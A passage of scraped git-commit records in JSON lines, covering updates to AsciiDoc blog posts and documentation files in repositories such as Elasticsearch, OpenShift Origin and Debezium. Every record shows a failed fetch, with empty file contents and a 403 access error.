craigmunro\/origin,tjanez\/origin,mdshuai\/origin,jhammant\/origin,mfisher-rht\/origin,gesrat-cisco\/origin,nitintutlani\/origin,jpeeler\/origin,sjug\/origin,willmtemple\/origin,willmtemple\/origin,inlandsee\/origin,stefwalter\/origin,mjisyang\/origin,zofuthan\/origin,robertol\/origin,juanvallejo\/origin,jhammant\/origin,wjiangjay\/origin,jhammant\/origin,burmanm\/origin,sseago\/origin,gruiz17\/origin,jwhonce\/origin,dcbw\/origin,mfojtik\/origin,pacoja84\/origin,fabianofranz\/origin,sdodson\/origin,mjisyang\/origin,EricMountain-1A\/openshift-origin,ramr\/origin,pkdevbox\/origin,hferentschik\/origin,nhr\/origin,samsong8610\/origin,pweil-\/origin,tracyrankin\/origin,levivic\/origin,vongalpha\/origin,rajatchopra\/origin,ncdc\/origin,hingstarne\/origin,vongalpha\/origin,hingstarne\/origin,joshuawilson\/origin,sseago\/origin,projectatomic\/atomic-enterprise,Jandersoft\/origin,ocsbrandon\/origin,swizzley\/origin,enj\/origin,jwforres\/origin,jeremyeder\/origin,dinhxuanvu\/origin,codificat\/origin,legionus\/origin,spinolacastro\/origin,spadgett\/origin,detiber\/origin,rrati\/origin,jprukner\/origin,smarterclayton\/origin,chmouel\/origin,detiber\/origin,kargakis\/origin,adietish\/origin,jwhonce\/origin,y0no\/origin,juanvallejo\/origin,childsb\/origin,ravisantoshgudimetla\/origin,rrati\/origin,tiwillia\/origin,asiainfoLDP\/datafactory,sallyom\/origin,jupierce\/origin,pkdevbox\/origin,rafabene\/origin,chlunde\/origin,sdodson\/origin,markllama\/atomic-enterprise,xiuwang\/origin,rhcarvalho\/origin,Jandersolutions\/origin,chmouel\/origin,stevekuznetsov\/origin,Nick-Harvey\/origin,luciddr
eamz\/origin,YannMoisan\/origin,pecameron\/origin,jim-minter\/origin,adelton\/origin,linzhaoming\/origin,barrett-vegas-com\/origin,JacobTanenbaum\/origin,Tlacenka\/origin,hroyrh\/origin,craigmunro\/origin,mfisher-rht\/origin,kargakis\/origin,jpeeler\/origin,mfojtik\/origin,jdnieto\/origin,fkirill\/origin,php-coder\/origin,linux-on-ibm-z\/origin,tracyrankin\/origin,asiainfoLDP\/datafactory,zhaosijun\/origin,legionus\/origin,gashcrumb\/origin,dcrisan\/origin,joshuawilson\/origin,ryanj\/origin,pacoja84\/origin,legionus\/origin,mrogers950\/origin,ejemba\/origin,myfear\/origin,soltysh\/origin,louyihua\/origin,gesrat-cisco\/origin,burmanm\/origin,abutcher\/origin,kargakis\/origin,maleck13\/origin,rhcarvalho\/origin,lorenzogm\/openshift-origin,hroyrh\/origin,spohnan\/origin,chlunde\/origin,miminar\/origin,akram\/origin,tnguyen-rh\/origin,seveillac\/origin,spohnan\/origin,mingderwang\/origin,simo5\/origin,tnozicka\/origin,Jandersoft\/origin,lixueclaire\/origin,dustintownsend\/origin,goern\/origin,rhuss\/origin,tnguyen-rh\/origin,sallyom\/origin,jhadvig\/origin,tagoh\/origin,spinolacastro\/origin,senayar\/origin,Tlacenka\/origin,ironcladlou\/origin,matthyx\/origin,gruiz17\/origin,YannMoisan\/origin,tnguyen-rh\/origin,mfisher-rht\/origin,y0no\/origin,dobbymoodge\/origin,grdryn\/origin,marsmensch\/atomic-enterprise,tdawson\/origin,PI-Victor\/origin,mingderwang\/origin,luciddreamz\/origin","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asiainfoLDP\/datafactory.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6e9cfe9fcadbea0b707bd194585aa20371624b5","subject":"Update 2016-09-26-Computer-Science-Week-4-Bins.adoc","message":"Update 2016-09-26-Computer-Science-Week-4-Bins.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-09-26-Computer-Science-Week-4-Bins.adoc","new_file":"_posts\/2016-09-26-Computer-Science-Week-4-Bins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55a668f998c8fbe80c51dcd2fc12425451c4593d","subject":"Added a recipe for date dimensions","message":"Added a recipe for date dimensions\n","repos":"korczis\/gooddata-ruby-examples,korczis\/gooddata-ruby-examples","old_file":"04_model\/finding_out_date_dimensions.asciidoc","new_file":"04_model\/finding_out_date_dimensions.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/korczis\/gooddata-ruby-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a6989fede633ceb7ff59ce1f6e1d145734254df","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4280ef450be0d01a518755390623bd9703cff3c4","subject":"Update 
2018-12-16-adams-method.adoc","message":"Update 2018-12-16-adams-method.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-16-adams-method.adoc","new_file":"_posts\/2018-12-16-adams-method.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e18782d11b6641a42707e7498bedad8453ba6b6","subject":"Update bucket-script-aggregation.asciidoc (#22219)","message":"Update bucket-script-aggregation.asciidoc (#22219)\n\nExample is missing \"params.\" for painless","repos":"markwalkom\/elasticsearch,Shepard1212\/elasticsearch,mikemccand\/elasticsearch,JackyMai\/elasticsearch,bawse\/elasticsearch,gfyoung\/elasticsearch,elasticdog\/elasticsearch,Shepard1212\/elasticsearch,wenpos\/elasticsearch,njlawton\/elasticsearch,scorpionvicky\/elasticsearch,brandonkearby\/elasticsearch,StefanGor\/elasticsearch,C-Bish\/elasticsearch,markwalkom\/elasticsearch,Stacey-Gammon\/elasticsearch,Helen-Zhao\/elasticsearch,brandonkearby\/elasticsearch,scottsom\/elasticsearch,qwerty4030\/elasticsearch,glefloch\/elasticsearch,fred84\/elasticsearch,gingerwizard\/elasticsearch,mikemccand\/elasticsearch,bawse\/elasticsearch,Helen-Zhao\/elasticsearch,uschindler\/elasticsearch,brandonkearby\/elasticsearch,wuranbo\/elasticsearch,artnowo\/elasticsearch,naveenhooda2000\/elasticsearch,MaineC\/elasticsearch,GlenRSmith\/elasticsearch,a2lin\/elasticsearch,winstonewert\/elasticsearch,JackyMai\/elasticsearch,LewayneNaidoo\/elasticsearch,fred84\/elasticsearch,nilabhsagar\/elasticsearch,jprante\/elasticsearch,jprante\/elasticsearch,alexshadow007\/elasticsearch,vroyer\/elasticassandra,scorpionvicky\/elasticsearch,elasticdog\/elasticsearch,fernandozhu\/elasticsearch,s1monw\/elasticsearch,lks21c\/elasticsearch,shreejay\/elasticsearch,IanvsPoplicola\/elasticsearch,GlenRSmith\/elasticsearch,a2lin\/elasticsearch,naveenhooda2000\/elasticsearch,gfyoung\/elasticsearch,scottsom\/elasticsearch,Stacey-Gammon\/elasticsearch,artnowo\/elasticsearch,jprante\/elasticsearch,rajanm\/elasticsearch,shreejay\/elasticsearch,mikemccand\/elasticsearch,JSCooke\/elasticsearch,nknize\/elasticsearch,geidies\/elasticsearch,ZTE-PaaS\/elasticsearch,LeoYao\/elasticsearch,geidies\/elasticsearch,scottsom\/elasticsearch,a2lin\/elasticsearch,JSCooke\/elasticsearch,kalimatas\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,elasticdog\/elasticsearch,nezirus\/elasticsearch,MisterAndersen\/elasticsearch,s1monw\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,geidies\/elasticsearch,winstonewert\/elasticsearch,jimczi\/elasticsearch,uschindler\/elasticsearch,LeoYao\/elasticsearch,rlugojr\/elasticsearch,robin13\/elasticsearch,masaruh\/elasticsearch,rajanm\/elasticsearch,mikemccand\/elasticsearch,nilabhsagar\/elasticsearch,nezirus\/elasticsearch,jimczi\/elasticsearch,LeoYao\/elasticsearch,nknize\/elasticsearch,henakamaMSFT\/elasticsearch,Helen-Zhao\/elasticsearch,nezirus\/elasticsearch,alexshadow007\/elasticsearch,HonzaKral\/elasticsearch,StefanGor\/elasticsearch,wenpos\/elasticsearch,naveenhooda2000\/elasticsearch,MaineC\/elasticsearch,fernandozhu\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wuranbo\/elasticsearch,uschindler\/elasticsearch,fred84\/elasticsearch,coding0011\/elasticsearch,artnowo\/elasticsearch,usc
hindler\/elasticsearch,umeshdangat\/elasticsearch,IanvsPoplicola\/elasticsearch,wuranbo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ZTE-PaaS\/elasticsearch,markwalkom\/elasticsearch,mjason3\/elasticsearch,alexshadow007\/elasticsearch,a2lin\/elasticsearch,gingerwizard\/elasticsearch,JackyMai\/elasticsearch,C-Bish\/elasticsearch,mjason3\/elasticsearch,nknize\/elasticsearch,C-Bish\/elasticsearch,JackyMai\/elasticsearch,maddin2016\/elasticsearch,alexshadow007\/elasticsearch,nazarewk\/elasticsearch,alexshadow007\/elasticsearch,sneivandt\/elasticsearch,fernandozhu\/elasticsearch,Shepard1212\/elasticsearch,mohit\/elasticsearch,kalimatas\/elasticsearch,MisterAndersen\/elasticsearch,gingerwizard\/elasticsearch,henakamaMSFT\/elasticsearch,Helen-Zhao\/elasticsearch,henakamaMSFT\/elasticsearch,sneivandt\/elasticsearch,Stacey-Gammon\/elasticsearch,nazarewk\/elasticsearch,strapdata\/elassandra,Stacey-Gammon\/elasticsearch,lks21c\/elasticsearch,njlawton\/elasticsearch,rlugojr\/elasticsearch,markwalkom\/elasticsearch,Helen-Zhao\/elasticsearch,jimczi\/elasticsearch,Shepard1212\/elasticsearch,wenpos\/elasticsearch,StefanGor\/elasticsearch,shreejay\/elasticsearch,gfyoung\/elasticsearch,nazarewk\/elasticsearch,markwalkom\/elasticsearch,gfyoung\/elasticsearch,naveenhooda2000\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,HonzaKral\/elasticsearch,geidies\/elasticsearch,MisterAndersen\/elasticsearch,a2lin\/elasticsearch,gfyoung\/elasticsearch,wangtuo\/elasticsearch,LewayneNaidoo\/elasticsearch,MisterAndersen\/elasticsearch,lks21c\/elasticsearch,robin13\/elasticsearch,ZTE-PaaS\/elasticsearch,s1monw\/elasticsearch,glefloch\/elasticsearch,pozhidaevak\/elasticsearch,nezirus\/elasticsearch,vroyer\/elassandra,rlugojr\/elasticsearch,glefloch\/elasticsearch,njlawton\/elasticsearch,StefanGor\/elasticsearch,jimczi\/elasticsearch,mjason3\/elasticsearch,scottsom\/elasticsearch,nazarewk\/elasticsearch,obourgain\/elasticsearch,henakamaMSFT\/elasticsearch,winstonewert\/elasticsearch,wangtuo\/elasticsearch,mortonsykes\/elasticsearch,pozhidaevak\/elasticsearch,mjason3\/elasticsearch,s1monw\/elasticsearch,glefloch\/elasticsearch,mortonsykes\/elasticsearch,umeshdangat\/elasticsearch,LeoYao\/elasticsearch,JSCooke\/elasticsearch,GlenRSmith\/elasticsearch,Shepard1212\/elasticsearch,mohit\/elasticsearch,mohit\/elasticsearch,mohit\/elasticsearch,coding0011\/elasticsearch,wuranbo\/elasticsearch,obourgain\/elasticsearch,maddin2016\/elasticsearch,scottsom\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,JSCooke\/elasticsearch,MaineC\/elasticsearch,gingerwizard\/elasticsearch,wuranbo\/elasticsearch,kalimatas\/elasticsearch,elasticdog\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,njlawton\/elasticsearch,geidies\/elasticsearch,HonzaKral\/elasticsearch,jprante\/elasticsearch,pozhidaevak\/elasticsearch,MisterAndersen\/elasticsearch,glefloch\/elasticsearch,rajanm\/elasticsearch,qwerty4030\/elasticsearch,qwerty4030\/elasticsearch,robin13\/elasticsearch,vroyer\/elassandra,wangtuo\/elasticsearch,scorpionvicky\/elasticsearch,fred84\/elasticsearch,rlugojr\/elasticsearch,mortonsykes\/elasticsearch,fernandozhu\/elasticsearch,ZTE-PaaS\/elasticsearch,GlenRSmith\/elasticsearch,LewayneNaidoo\/elasticsearch,maddin2016\/elasticsearch,masaruh\/elasticsearch,mortonsykes\/elasticsearch,geidies\/elasticsearch,winstonewert\/elasticsearch,LeoYao\/elasticsearch,wenpos\/elasticsearch,coding0011\/elasticsearch,IanvsPoplicola\/elasticsearch,s1monw\/elasti
csearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jimczi\/elasticsearch,mohit\/elasticsearch,bawse\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JSCooke\/elasticsearch,vroyer\/elasticassandra,njlawton\/elasticsearch,nknize\/elasticsearch,qwerty4030\/elasticsearch,strapdata\/elassandra,MaineC\/elasticsearch,IanvsPoplicola\/elasticsearch,strapdata\/elassandra,obourgain\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,elasticdog\/elasticsearch,henakamaMSFT\/elasticsearch,obourgain\/elasticsearch,artnowo\/elasticsearch,GlenRSmith\/elasticsearch,bawse\/elasticsearch,sneivandt\/elasticsearch,sneivandt\/elasticsearch,vroyer\/elassandra,masaruh\/elasticsearch,nilabhsagar\/elasticsearch,HonzaKral\/elasticsearch,JackyMai\/elasticsearch,obourgain\/elasticsearch,LewayneNaidoo\/elasticsearch,kalimatas\/elasticsearch,mjason3\/elasticsearch,umeshdangat\/elasticsearch,brandonkearby\/elasticsearch,shreejay\/elasticsearch,nezirus\/elasticsearch,lks21c\/elasticsearch,coding0011\/elasticsearch,nilabhsagar\/elasticsearch,winstonewert\/elasticsearch,C-Bish\/elasticsearch,i-am-Nathan\/elasticsearch,i-am-Nathan\/elasticsearch,sneivandt\/elasticsearch,MaineC\/elasticsearch,lks21c\/elasticsearch,fred84\/elasticsearch,wangtuo\/elasticsearch,i-am-Nathan\/elasticsearch,vroyer\/elasticassandra,masaruh\/elasticsearch,nilabhsagar\/elasticsearch,i-am-Nathan\/elasticsearch,bawse\/elasticsearch,StefanGor\/elasticsearch,robin13\/elasticsearch,Stacey-Gammon\/elasticsearch,scorpionvicky\/elasticsearch,maddin2016\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,jprante\/elasticsearch,IanvsPoplicola\/elasticsearch,umeshdangat\/elasticsearch,artnowo\/elasticsearch,strapdata\/elassandra,maddin2016\/elasticsearch,C-Bish\/elasticsearch,gingerwizard\/elasticsearch,brandonkearby\/elasticsearch,i-am-Nathan\/elasticsearch,markwalkom\/elasticsearch,nknize\/elasticsearch,LeoYao\/elasticsearch,strapdata\/elassandra,pozhidaevak\/elasticsearch,shreejay\/elasticsearch,ZTE-PaaS\/elasticsearch,rlugojr\/elasticsearch,naveenhooda2000\/elasticsearch,mikemccand\/elasticsearch,fernandozhu\/elasticsearch,mortonsykes\/elasticsearch,wangtuo\/elasticsearch,umeshdangat\/elasticsearch,nazarewk\/elasticsearch,LewayneNaidoo\/elasticsearch","old_file":"docs\/reference\/aggregations\/pipeline\/bucket-script-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/pipeline\/bucket-script-aggregation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5b1f084daa66d8da1630f849ccd07b5fc8f0a5e8","subject":"Update ch11-bigdata.adoc","message":"Update ch11-bigdata.adoc","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch11-bigdata.adoc","new_file":"developer-tools\/java\/chapters\/ch11-bigdata.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8654e5ac180e76761ace646e914bf918b846366f","subject":"y2b create post IMPORTANT ANNOUNCEMENT!","message":"y2b create post IMPORTANT 
ANNOUNCEMENT!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-10-IMPORTANT-ANNOUNCEMENT.adoc","new_file":"_posts\/2011-10-10-IMPORTANT-ANNOUNCEMENT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b00ef3192333c1388c1f7b327662aa6e24fc2c3","subject":"Update 2015-09-14-Episode-21-Feelin-Good.adoc","message":"Update 2015-09-14-Episode-21-Feelin-Good.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-09-14-Episode-21-Feelin-Good.adoc","new_file":"_posts\/2015-09-14-Episode-21-Feelin-Good.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d396631c6abcade0c58ef541651158c7cd764437","subject":"Update 2018-09-08-Go.adoc","message":"Update 2018-09-08-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-08-Go.adoc","new_file":"_posts\/2018-09-08-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18fb4877cf873ad4e53812de66c847b85d96aeaa","subject":"Update 2015-02-17-Lemons.adoc","message":"Update 2015-02-17-Lemons.adoc","repos":"SwarnaKishore\/blog,SwarnaKishore\/blog,SwarnaKishore\/blog","old_file":"_posts\/2015-02-17-Lemons.adoc","new_file":"_posts\/2015-02-17-Lemons.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SwarnaKishore\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddcec910e8cfc08c074d9e662fa6d98a3c85d908","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"888befc52e637c47bc3e8323f40fa09431232996","subject":"Update 2017-06-21-Podcast-Brad-Billings.adoc","message":"Update 2017-06-21-Podcast-Brad-Billings.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-06-21-Podcast-Brad-Billings.adoc","new_file":"_posts\/2017-06-21-Podcast-Brad-Billings.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f408bb7013c4dfe4cd913abfad98ff69d1ff430","subject":"y2b create post 3 Cool Tech Deals - #14","message":"y2b create post 3 Cool Tech Deals - #14","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-03-28-3-Cool-Tech-Deals--14.adoc","new_file":"_posts\/2016-03-28-3-Cool-Tech-Deals--14.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdfe2dd2133d39568fd724b25d5a860816c7322c","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0a405dbbac2f1d1af36da622321ee7d4664038f","subject":"y2b create post Corsair Vengeance 1500 v2 Unboxing (Gaming Headset)","message":"y2b create post Corsair Vengeance 1500 v2 Unboxing (Gaming Headset)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-02-18-Corsair-Vengeance-1500-v2-Unboxing-Gaming-Headset.adoc","new_file":"_posts\/2014-02-18-Corsair-Vengeance-1500-v2-Unboxing-Gaming-Headset.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65c029e22aa2eda85e7a6904956d5f38878d1e1d","subject":"Update 2015-02-12-dev.adoc","message":"Update 2015-02-12-dev.adoc","repos":"devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io","old_file":"_posts\/2015-02-12-dev.adoc","new_file":"_posts\/2015-02-12-dev.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devkamboj\/devkamboj.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8dc78b5868ee96e0c7ca3247e2df775a5df09abe","subject":"Update 2015-09-17-917.adoc","message":"Update 2015-09-17-917.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-17-917.adoc","new_file":"_posts\/2015-09-17-917.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f4efac31d74f04593ad35d650b4be9342fb8524","subject":"Update 2015-02-20-Python-Para-principantes.adoc","message":"Update 
2015-02-20-Python-Para-principantes.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-02-20-Python-Para-principantes.adoc","new_file":"_posts\/2015-02-20-Python-Para-principantes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f6db4006dddb3758e216e2e264cf6bbcdfaee54","subject":"Update 2016-05-04-Wordpress-Settings-A-P-I.adoc","message":"Update 2016-05-04-Wordpress-Settings-A-P-I.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-05-04-Wordpress-Settings-A-P-I.adoc","new_file":"_posts\/2016-05-04-Wordpress-Settings-A-P-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e782806d50b226850df519629c1561e0f9da1139","subject":"Bringing back \"DBZ-4260 Blog post for Debezium UI topic auto-creation\";","message":"Bringing back \"DBZ-4260 Blog post for Debezium UI topic auto-creation\";\n\nThis reverts commit 52454acf0d6e348c3263b610516df6163d3931e4. Also adjusting name and some other minor fixes.\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-12-02-debezium-ui-topic-groups.adoc","new_file":"_posts\/2021-12-02-debezium-ui-topic-groups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"77e24ef134a558f3dba44ff8de3c9524a6ca1895","subject":"Update 2015-10-13-HDFS-tutorial.adoc","message":"Update 2015-10-13-HDFS-tutorial.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-13-HDFS-tutorial.adoc","new_file":"_posts\/2015-10-13-HDFS-tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9223e21d8f0332cc77bc9be3637503d92f91f624","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e994ab1ef45e969b3ae6dd3e25f3d1800a940fb","subject":"Update 2013-06-04-Class-PHPUnit_Framework_TestCase-could-not-be-found-when-installing-CakePHP-through-Composer.adoc","message":"Update 
2013-06-04-Class-PHPUnit_Framework_TestCase-could-not-be-found-when-installing-CakePHP-through-Composer.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-06-04-Class-PHPUnit_Framework_TestCase-could-not-be-found-when-installing-CakePHP-through-Composer.adoc","new_file":"_posts\/2013-06-04-Class-PHPUnit_Framework_TestCase-could-not-be-found-when-installing-CakePHP-through-Composer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e59e63dfd2fa10253b070850e436b355bb72762","subject":"0.7.1 Release announcement blogpost","message":"0.7.1 Release announcement blogpost\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2017-12-20-debezium-0-7-1-released.adoc","new_file":"blog\/2017-12-20-debezium-0-7-1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"766972a024da7bc7c2f72256e29b9c9035e528b7","subject":"Update 2016-03-12-.adoc","message":"Update 2016-03-12-.adoc","repos":"kai-cn\/kai-cn.github.io,kai-cn\/kai-cn.github.io,kai-cn\/kai-cn.github.io,kai-cn\/kai-cn.github.io","old_file":"_posts\/2016-03-12-.adoc","new_file":"_posts\/2016-03-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kai-cn\/kai-cn.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c94404f70940b3d09a8fe1c72dbe9af4dc752f17","subject":"Update 2016-03-16-.adoc","message":"Update 2016-03-16-.adoc","repos":"s-f-ek971\/s-f-ek971.github.io,s-f-ek971\/s-f-ek971.github.io,s-f-ek971\/s-f-ek971.github.io,s-f-ek971\/s-f-ek971.github.io","old_file":"_posts\/2016-03-16-.adoc","new_file":"_posts\/2016-03-16-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 